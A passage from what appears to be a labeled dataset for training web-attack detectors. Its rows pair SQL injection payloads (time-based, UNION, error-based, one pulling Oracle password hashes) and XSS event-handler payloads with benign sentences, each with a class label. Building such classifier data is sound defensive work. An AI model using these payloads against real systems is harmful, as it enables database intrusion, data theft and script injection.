""",2,SQLi,12368 +"1%"" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""%"" = """,2,SQLi,15288 +<sCriPt x>(((confirm)))``</scRipt x>,1,XSS,9193 +"1"" ) as jscj where 2308 = 2308 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,16506 +"))) AND ELT(1337=1337,SLEEP(5)) AND (((1337"" LIKE ""1337",2,SQLi,11199 +"<div draggable=""true"" contenteditable>drag me</div><bdi ondragover=alert(1) contenteditable>drop here</bdi>",1,XSS,7467 +select * from users where id = 1 <@.. or 1 = 1 -- 1,2,SQLi,11925 +<caption onpointerover=alert(1)>XSS</caption>,1,XSS,4702 +"1'+ ( select 'zirh' where 9054 = 9054 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) +'",2,SQLi,12680 +"When Massachusetts was called upon to select for Statuary Hall in the capitol at Washington two figures from the long line of her worthies, she chose as her fittest representatives John Winthrop, the type of Puritanism and state-builder, and Samuel Adams (though here the choice was difficult between Samuel Adams and John Adams) as her greatest leader in the heroic period of the War of Independence.",0,normal,25120 +1' ) where 5286 = 5286,2,SQLi,17787 +"1' ) ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 'phdn' like 'phdn",2,SQLi,20893 +"1"" ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ""zlwb"" = ""zlwb",2,SQLi,21951 +<br onpointerleave=alert(1)>XSS</br>,1,XSS,2333 +cursor,0,normal,23128 +<button onpointerdown=alert(1)>XSS</button>,1,XSS,3715 +"Then, you'll need to select Download.",0,normal,25303 +People can select a reason when they flag a video.,0,normal,25744 +"1' ) where 4683 = 4683 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,17595 +"1 ) ) ) union all select null,null#",2,SQLi,16701 +"1"" or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""ncym"" like ""ncym",2,SQLi,13726 +"You can find the new collection in select Levi's stores, Levi.",0,normal,25060 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,10557 +"1%' ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,14077 +or 'unusual' = 'unusual',2,SQLi,10013 +1' ) as wpmv where 1479 = 1479 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,18653 +"1' ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,17592 +Select your succeed.,0,normal,24974 +"1%"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""%"" = """,2,SQLi,21392 +") or ('a'='a and hi"") or (""a""=""a",2,SQLi,9949 +select ( case when ( 1082 = 6755 ) then 1082 else 1082* ( select 1082 from mysql.db ) end ) #,2,SQLi,21978 +"<listing onmousedown=""alert(1)"">test</listing>",1,XSS,8194 +"-6267"" ) ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( ""rqws"" = ""rqws",2,SQLi,19010 +<input2 onpointerleave=alert(1)>XSS</input2>,1,XSS,2239 +"<sub draggable=""true"" ondragenter=""alert(1)"">test</sub>",1,XSS,6215 +"Then, they strategically select each recyclable material for its structural properties.",0,normal,25305 +1 ) and 7533 = 7533,2,SQLi,18705 +<audio id=x tabindex=1 onactivate=alert(1)></audio>,1,XSS,4814 +"-5062"" ) ) ) or ( 1069 = 8974 ) *8974 and ( ( ( ""hsge"" = ""hsge",2,SQLi,14384 +<input onpointerleave=alert(1)>XSS</input>,1,XSS,2899 +1'|| ( select 'vpuh' where 8164 = 8164,2,SQLi,20093 +"1, ( select ( case when ( 5334 = 4976 ) then 1 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual )",2,SQLi,22317 +"<shadow draggable=""true"" ondragstart=""alert(1)"">test</shadow>",1,XSS,4129 +1%' ) ) ) and 9198 = 9198--,2,SQLi,19073 +"1"" and elt ( 2373 = 5817,5817 ) and ""rsdt"" = ""rsdt",2,SQLi,15540 +"<style>:target {color: red;}</style><html id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></html>",1,XSS,7323 +"Macy's: Super Saturday Sale: Save on select bed and bath, dining and entertaining, furniture, kitchen, luggage, lighting and more; save 25% – 753% off select clearance; save an extra 15% – 20% off select departments with code SUPER.",0,normal,25853 +select,0,normal,26519 +Create sculpture.,0,normal,23001 +"<style>:target {color: red;}</style><a id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></a>",1,XSS,3209 +"1%' ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13605 +<isindex onpointerover=alert(1)>XSS</isindex>,1,XSS,3542 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></slot>",1,XSS,3939 +"<nextid onmouseleave=""alert(1)"">test</nextid>",1,XSS,3493 +1 where 7802 = 7802,2,SQLi,16412 +1' ) as bihs where 4197 = 4197,2,SQLi,12539 +Delete outdated files from the directory.,0,normal,22870 +"<img src\x47=x onerror=""javascript:alert(1)"">",1,XSS,627 +1' ) ) ) and sleep ( 5 ) and ( ( ( 'lbmp' = 'lbmp,2,SQLi,20802 +-4954' ) or 8571 = 8571--,2,SQLi,21769 +1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ),2,SQLi,22092 +"1' ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,18211 +"1'+ ( select 'sqje' where 1634 = 1634 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) +'",2,SQLi,20449 +"<col onbeforecut=""alert(1)"" contenteditable>test</col>",1,XSS,2813 +<div onpointerup=alert(1)>XSS</div>,1,XSS,2944 +"1"" ) ) as hace where 8785 = 8785",2,SQLi,22399 +<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>,1,XSS,18 +"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">",1,XSS,275 +select ( case when ( 8841 = 9675 ) then 8841 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,16385 +waitfor delay '0:0:5' and 'fjpf' like 'fjpf,2,SQLi,18180 +1 where 7516 = 7516 union all select null#,2,SQLi,16979 +"1%"" ) union all select null--",2,SQLi,14264 +Carefully select your honeymoon itinerary.,0,normal,24361 +I want to select a movie for our movie night.,0,normal,23921 +I want to choose a restaurant for dinner.,0,normal,23667 +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;,1,XSS,810 +1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and 'mabd' = 'mabd,2,SQLi,13475 +"1"" where 9669 = 9669",2,SQLi,20988 +Where's the shaman?,0,normal,23620 +<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote>,1,XSS,6518 +Once you select the hardware handshake option the state of the CTS input to the computer becomes important.,0,normal,25786 +"1"" where 4366 = 4366 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,16114 +1' ) as llug where 2244 = 2244 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,12177 +"<progress draggable=""true"" ondragend=""alert(1)"">test</progress>",1,XSS,7746 +<svg><area onload=alert(1)></area>,1,XSS,2704 +<header onpointerenter=alert(1)>XSS</header>,1,XSS,3063 +"-1065 ) ) union all select 7437,7437,7437,7437,7437,7437,7437,7437--",2,SQLi,12236 +"1%"" ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,19911 +1 ) where 3381 = 3381 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,21366 +"-2384%' ) ) union all select 2467,2467,2467,2467#",2,SQLi,17424 +"""Mike Wallace is Here"" premieres in select theaters on July 26.",0,normal,26414 +1%' ) rlike sleep ( 5 ) #,2,SQLi,16747 +select ( case when ( 3325 = 1767 ) then 3325 else 3325* ( select 3325 from mysql.db ) end ) #,2,SQLi,16125 +"<basefont oncopy=""alert(1)"" contenteditable>test</basefont>",1,XSS,6146 +"If you touch and hold your finger on a space where text can occupy, you'll see options to Select and Select All.",0,normal,26002 +1' ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 'ujds' = 'ujds,2,SQLi,18725 +"<button onmousemove=""alert(1)"">test</button>",1,XSS,7740 +<head id=x tabindex=1 onfocus=alert(1)></head>,1,XSS,3469 +"-8144' ) where 1691 = 1691 or elt ( 7246 = 7816,7816 ) --",2,SQLi,17578 +/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />,1,XSS,9354 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></bdo>",1,XSS,8345 +1'|| ( select 'tisi' from dual where 1616 = 1616 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) ) ||',2,SQLi,21220 +"-5575"" union all select 8665,8665,8665,8665,8665,8665,8665--",2,SQLi,12650 +"-2722"" ) or 4907 = 8126#",2,SQLi,15760 +"admin"" or ""1""=""1",2,SQLi,9889 +"-6870"" ) as deox where 8198 = 8198 union all select 8198#",2,SQLi,21878 +"1' in boolean mode ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,13287 +<meter id=x tabindex=1 onactivate=alert(1)></meter>,1,XSS,8841 +Select your prayer.,0,normal,24904 +<shadow id=x tabindex=1 onfocus=alert(1)></shadow>,1,XSS,5422 +"<ol onbeforecut=""alert(1)"" contenteditable>test</ol>",1,XSS,5577 +1' where 8469 = 8469,2,SQLi,18633 +Select the correct answer.,0,normal,24255 +"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,10903 +Select pillow.,0,normal,23013 +<i onpointerout=alert(1)>XSS</i>,1,XSS,6523 +"<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>",1,XSS,9213 +<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup>,1,XSS,2459 +1 and 1 = 1,2,SQLi,11466 +"<data oncontextmenu=""alert(1)"">test</data>",1,XSS,5394 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23",2,SQLi,10329 +"<small onkeypress=""alert(1)"" contenteditable>test</small>",1,XSS,6650 +"-8454"" or 6872 = 6872",2,SQLi,21377 +"<script draggable=""true"" ondragend=""alert(1)"">test</script>",1,XSS,2951 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9#",2,SQLi,10432 +"<figcaption onmousemove=""alert(1)"">test</figcaption>",1,XSS,8305 +I'm considering where to spend the weekend.,0,normal,23704 +"<strike onmouseleave=""alert(1)"">test</strike>",1,XSS,5636 +"<html onpaste=""alert(1)"" contenteditable>test</html>",1,XSS,3399 +"1' ) as ezoa where 4915 = 4915 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,21168 +"<address onmouseout=""alert(1)"">test</address>",1,XSS,8426 +"1 and elt ( 2770 = 3669,3669 ) # sfls",2,SQLi,15242 +<svg><rp onload=alert(1)></rp>,1,XSS,6225 +“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//,1,XSS,9738 +"<header draggable=""true"" ondrag=""alert(1)"">test</header>",1,XSS,4073 +"1 ) as kjsd where 1670 = 1670 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20922 +1'|| ( select 'jslz' where 8405 = 8405 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) ) ||',2,SQLi,21280 +"<style>@keyframes x{}</style><div style=""animation-name:x"" onanimationend=""alert(1)""></div>",1,XSS,8457 +Only select school administrators and instructors knew the participants' true identities.,0,normal,25776 +"<div draggable=""true"" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress>",1,XSS,5996 +"<img \x47src=x onerror=""javascript:alert(1)"">",1,XSS,609 +"Up to 30% off select men's, women's and kids' swimwear",0,normal,25183 +To select your chosen venue from this shortlist simply click on a photograph.,0,normal,25208 +"1"" or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,12944 +-4184' ) ) ) or 2579 = 4654#,2,SQLi,18168 +-3436 ) or 9281 = 3172,2,SQLi,15547 +"1"" ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""vypw"" like ""vypw",2,SQLi,14734 +"<div style=""width: expression(document.vulnerable=true;);"">",1,XSS,1477 +"-6158"" ) union all select 3084,3084,3084,3084,3084,3084#",2,SQLi,12275 +1 where 1576 = 1576,2,SQLi,17100 +"-6475"" ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( ""mdsx"" like ""mdsx",2,SQLi,18387 +"-6084"" ) ) union all select 7354,7354,7354,7354,7354,7354,7354,7354#",2,SQLi,13632 +"<dialog onbeforecopy=""alert(1)"" contenteditable>test</dialog>",1,XSS,4417 +"<isindex ondblclick=""alert(1)"">test</isindex>",1,XSS,3394 +"1' ) ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,19221 +"1' ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( 'pded' = 'pded",2,SQLi,18601 +-8722%' or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and '%' = ',2,SQLi,22216 +1' where 6583 = 6583,2,SQLi,17504 +"; if not ( substring ( ( select @@version ) ,25,1 ) <> 5 ) waitfor delay '0:0:2' --",2,SQLi,11774 +"1', ( select ( case when ( 7734 = 7734 ) then ( select benchmark ( 5000000,md5 ( 0x72747341 ) ) ) else 7734* ( select 7734 from mysql.db ) end ) )",2,SQLi,19629 +"Max Read, the former editor of Gawker, will lead Select All.",0,normal,25844 +"<summary draggable=""true"" ondrag=""alert(1)"">test</summary>",1,XSS,6054 +-6855' ) or 8519 = 9248,2,SQLi,19685 +"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ""qkat"" = ""qkat",2,SQLi,17285 +<html id=x tabindex=1 onactivate=alert(1)></html>,1,XSS,6194 +"-7574%"" ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""%"" = """,2,SQLi,15099 +"1"" ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ""hhwy"" = ""hhwy",2,SQLi,19016 +Select your dialogue.,0,normal,24871 +1' ) ) as xkiq where 9008 = 9008 and sleep ( 5 ) --,2,SQLi,20767 +"<html oncontextmenu=""alert(1)"">test</html>",1,XSS,3799 +""" or ""a""=""a",2,SQLi,11030 +Select the perfect gift for the occasion.,0,normal,24217 +"1%"" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( ""%"" = """,2,SQLi,16904 +<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus>,1,XSS,2446 +"-9487 ) ) as rvck where 9404 = 9404 or make_set ( 8921 = 6045,6045 ) --",2,SQLi,22143 +"<img onclick=""alert(1)"">test</img>",1,XSS,7662 +"&lt;SPAN DATASRC=\""#xss\"" DATAFLD=\""B\"" DATAFORMATAS=\""HTML\""&gt;&lt;/SPAN&gt;",1,XSS,981 +"Everett was a member of nearly all the most important select committees, such as those on the Indian relations of the state of Georgia, the Apportionment Bill, and the Bank of the United States, and drew the report either of the majority or the minority.",0,normal,26166 +create,0,normal,23081 +select sleep ( 5 ) and ( ( ( 8354 = 8354,2,SQLi,18415 +"<code draggable=""true"" ondragenter=""alert(1)"">test</code>",1,XSS,5044 +"1%' ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ( ( '%' = '",2,SQLi,14322 +1' where 2958 = 2958,2,SQLi,21214 +1 ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( 1476 = 1476,2,SQLi,13889 +ORDER BY 2#,2,SQLi,10169 +"1' in boolean mode ) union all select null,null,null,null#",2,SQLi,17437 +Update your phone's software.,0,normal,22534 +Select your strategy.,0,normal,24800 +1' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( 'jrpk' = 'jrpk,2,SQLi,12478 +select current_user;,2,SQLi,22445 +<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus>,1,XSS,7222 +<x oncontextmenu=alert(1)>right click this!,1,XSS,9292 +"<nextid draggable=""true"" ondragend=""alert(1)"">test</nextid>",1,XSS,7485 +<body id=x tabindex=1 onfocus=alert(1)></body>,1,XSS,2924 +McDermott will be questioned by parliament's Treasury Select Committee on Jan.,0,normal,25843 +"<title onkeyup=""alert(1)"" contenteditable>test</title>",1,XSS,3003 +"<param onkeyup=""alert(1)"" contenteditable>test</param>",1,XSS,6900 +"1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( 'eugs' = 'eugs",2,SQLi,12574 +"-4166%"" ) union all select 5190--",2,SQLi,14050 +<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus>,1,XSS,7338 +"1 ) as hywx where 1424 = 1424 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,17463 +") and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,10934 +"<spacer onkeydown=""alert(1)"" contenteditable>test</spacer>",1,XSS,2705 +"1' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'tzrd' = 'tzrd",2,SQLi,20602 +"1"" ) as vcvw where 2445 = 2445 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) --",2,SQLi,18569 +veris-->group<svg/onload=alert(/XSS/)//,1,XSS,1113 +"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ""%"" = """,2,SQLi,14065 +"<basefont draggable=""true"" ondrag=""alert(1)"">test</basefont>",1,XSS,6965 +"<article onbeforecut=""alert(1)"" contenteditable>test</article>",1,XSS,3028 +-1662 where 1119 = 1119 or ( 8459 = 8459 ) *4906--,2,SQLi,18235 +<xss id=x tabindex=1 onfocusin=alert(1)></xss>,1,XSS,6674 +"<frameset onkeypress=""alert(1)"" contenteditable>test</frameset>",1,XSS,5599 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))",2,SQLi,10613 +"select count ( * ) from generate_series ( 1,5000000 ) and ( 8997 = 8997",2,SQLi,15325 +<progress id=x tabindex=1 onfocus=alert(1)></progress>,1,XSS,6700 +1 where 3357 = 3357 and ( 9492 = 4334 ) *4334--,2,SQLi,16553 +"select * from users where id = 1 or 1#""; union select 'a',version ( ) -- 1",2,SQLi,11844 +<textarea onauxclick=alert(1)>XSS</textarea>,1,XSS,3573 +<body id=x tabindex=1 onactivate=alert(1)></body>,1,XSS,2662 +Select soup.,0,normal,24463 +"<a href=""\x13javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,486 +"1"" ) ) as gbxx where 2459 = 2459 waitfor delay '0:0:5'--",2,SQLi,21145 +Associations could self-select by accepting only businesses with healthy employees.,0,normal,26300 +<basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus>,1,XSS,4631 +Delete the old bookmarks.,0,normal,22610 +"<div draggable=""true"" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot>",1,XSS,2930 +"<font onmouseup=""alert(1)"">test</font>",1,XSS,5349 +Where clause for filtering.,0,normal,23408 +Select tequila.,0,normal,24483 +<canvas onpointerout=alert(1)>XSS</canvas>,1,XSS,3979 +I'm considering where to attend a seminar.,0,normal,23876 +"1"" rlike sleep ( 5 ) and ""veub"" = ""veub",2,SQLi,12855 +"-9392 ) ) or elt ( 1032 = 1032,3623 ) and ( ( 2975 = 2975",2,SQLi,16146 +"<body onmouseover=""alert(1)"">test</body>",1,XSS,6085 +"1 ) where 5096 = 5096 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16326 +Select your agreement.,0,normal,24914 +"<div draggable=""true"" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea>",1,XSS,5287 +"-3885 ) where 2387 = 2387 union all select 2387,2387,2387,2387,2387,2387,2387#",2,SQLi,13209 +"-3472' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,18039 +Select jog.,0,normal,24608 +"-4739' ) ) union all select 6585,6585,6585,6585,6585--",2,SQLi,18037 +"<div draggable=""true"" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead>",1,XSS,8310 +"<div draggable=""true"" contenteditable>drag me</div><p ondragover=alert(1) contenteditable>drop here</p>",1,XSS,3539 +"1' where 4358 = 4358 union all select null,null,null,null--",2,SQLi,19727 ++(select*from(select(sleep(5)))a)+',2,SQLi,11073 +1'|| ( select 'idna' from dual where 2683 = 2683 rlike ( select ( case when ( 3201 = 9748 ) then 1 else 0x28 end ) ) ) ||',2,SQLi,20745 +"<% foo><x foo=""%><script>alert(91)</script>"">//[""'`-->]]>]</div>",1,XSS,8970 +"ORDER BY 1,SLEEP(5)--",2,SQLi,10366 +"<title onmouseout=""alert(1)"">test</title>",1,XSS,1854 +"<dt onmouseup=""alert(1)"">test</dt>",1,XSS,5325 +"1"" ) as iwri where 4921 = 4921 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --",2,SQLi,20815 +"<dd draggable=""true"" ondragenter=""alert(1)"">test</dd>",1,XSS,5562 +"-8117' union all select 9945,9945,9945,9945,9945,9945,9945#",2,SQLi,16127 +"<ins draggable=""true"" ondragstart=""alert(1)"">test</ins>",1,XSS,4985 +So how is it possible to select a powerful traffic-pulling phrase in this fashion without researching it in real time?,0,normal,25503 +"<cite oncopy=""alert(1)"" contenteditable>test</cite>",1,XSS,2907 +1' ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( 'gzpx' = 'gzpx,2,SQLi,18487 +"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i",2,SQLi,10991 +"1"" ) ) as ltco where 3862 = 3862 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12898 +document.documentElement.nodeName,1,XSS,6003 +-8860 ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,22123 +"<style>@keyframes slidein {}</style><th style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></th>",1,XSS,8584 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23",2,SQLi,10884 +"<img oncontextmenu=""alert(1)"">test</img>",1,XSS,6529 +"<div draggable=""true"" contenteditable>drag me</div><del ondragover=alert(1) contenteditable>drop here</del>",1,XSS,8505 +"<dir oncopy=""alert(1)"" contenteditable>test</dir>",1,XSS,8234 +hi' or 1 = 1 --,2,SQLi,11792 +) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11143 +"1"" ) where 3445 = 3445 and elt ( 1212 = 1254,1254 ) --",2,SQLi,16923 +"Unfortunately such allusion to these disconnected certainties as alone might be introduced here would be too brief for comprehension, and we are forced to select a few of the broader hypotheses for a treatment that may seem dogmatic and prejudiced.",0,normal,25191 +"<style>@keyframes x{}</style><table style=""animation-name:x"" onanimationend=""alert(1)""></table>",1,XSS,3729 +"<q draggable=""true"" ondragenter=""alert(1)"">test</q>",1,XSS,2256 +Select upload.,0,normal,24559 +"end and ( ""vwbx"" = ""vwbx",2,SQLi,12130 +Select your sport.,0,normal,24890 +Join the fitness club.,0,normal,22602 +<bdi onpointermove=alert(1)>XSS</bdi>,1,XSS,2590 +1'|| ( select 'svnn' from dual where 8710 = 8710,2,SQLi,21966 +"1"" ) ) as uqem where 3521 = 3521",2,SQLi,21095 +"<output draggable=""true"" ondragend=""alert(1)"">test</output>",1,XSS,5953 +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E,1,XSS,9694 +Select your size.,0,normal,24770 +1' ) union all select null--,2,SQLi,14376 +"-1422%"" ) or make_set ( 9539 = 9519,9519 ) and ( ""%"" = """,2,SQLi,18785 +1 ) ) union all select null--,2,SQLi,17535 +"<label onkeyup=""alert(1)"" contenteditable>test</label>",1,XSS,7650 +&#x00003c;,1,XSS,1035 +"<input onmouseout=""alert(1)"">test</input>",1,XSS,5211 +"<style>@keyframes x{}</style><video style=""animation-name:x"" onanimationstart=""alert(1)""></video>",1,XSS,5004 +"[alert][0].call(this,1)",1,XSS,9335 +"<image onmouseout=""alert(1)"">test</image>",1,XSS,6007 +"1' ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( 'yabn' = 'yabn",2,SQLi,14394 +"1' and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'wjwn' = 'wjwn",2,SQLi,12219 +"1%' and 2388 = benchmark ( 5000000,md5 